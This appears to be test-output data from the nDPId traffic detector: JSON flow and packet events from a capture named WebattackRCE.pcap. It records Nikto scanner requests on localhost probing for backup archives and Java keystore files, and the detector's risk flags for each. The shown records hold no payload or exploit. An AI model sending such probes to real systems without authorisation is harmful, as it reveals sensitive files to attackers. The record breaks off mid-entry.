-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277051,"pkt":"AAAAAAAAAAAAAAAACABFAADFD2RAAEAGLM1\/AAABfwAAAcN2H5CQvDcOP8imdIAYAED+uQAAAQEICp1m\/GOdZvxjR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277054,"pkt":"AAAAAAAAAAAAAAAACABFAADFMyBAAEAGCRF\/AAABfwAAAcN4H5CwJQty\/UTYeoAYAED+uQAAAQEICp1m\/GadZvxmR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277055,"pkt":"AAAAAAAAAAAAAAAACABFAADBVOZAAEAG505\/AAABfwAAAcN6H5D0fGyVu01Ol4AYAED+tQAAAQEICp1m\/GedZvxnR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277057,"pkt":"AAAAAAAAAAAAAAAACABFAADBgcdAAEAGum1\/AAABfwAAAcN8H5AHG7m2UJwwhYAYAED+tQAAAQEICp1m\/GmdZvxpR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277058,"pkt":"AAAAAAAAAAAAAAAACABFAADB8E5AAEAGS+Z\/AAABfwAAAcN+H5BxG8g961ERj4AYAED+tQAAAQEICp1m\/GqdZvxqR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277060,"pkt":"AAAAAAAAAAAAAAAACABFAADB8w9AAEAGSSV\/AAABfwAAAcOAH5AJpMt9MSZkIYAYAED+tQAAAQEICp1m\/GydZvxsR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277061,"pkt":"AAAAAAAAAAAAAAAACABFAADDv8dAAEAGfGt\/AAABfwAAAcOCH5BIh4e15F5tqYAYAED+twAAAQEICp1m\/G2dZvxtR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277063,"pkt":"AAAAAAAAAAAAAAAACABFAADDTFBAAEAG7+J\/AAABfwAAAcOEH5DLhXRAbe\/JloAYAED+twAAAQEICp1m\/G+dZvxvR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277064,"pkt":"AAAAAAAAAAAAAAAACABFAADCx41AAEAGdKZ\/AAABfwAAAcOGH5Ab+v\/67hwkoIAYAED+tgAAAQEICp1m\/HCdZvxwR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277066,"pkt":"AAAAAAAAAAAAAAAACABFAADC4+FAAEAGWFJ\/AAABfwAAAcOIH5A1wtuuFoHVMYAYAED+tgAAAQEICp1m\/HGdZvxxR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277067,"pkt":"AAAAAAAAAAAAAAAACABFAADCfFhAAEAGv9t\/AAABfwAAAcOKH5CRgEQl8Paa6IAYAED+tgAAAQEICp1m\/HOdZvxzR0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 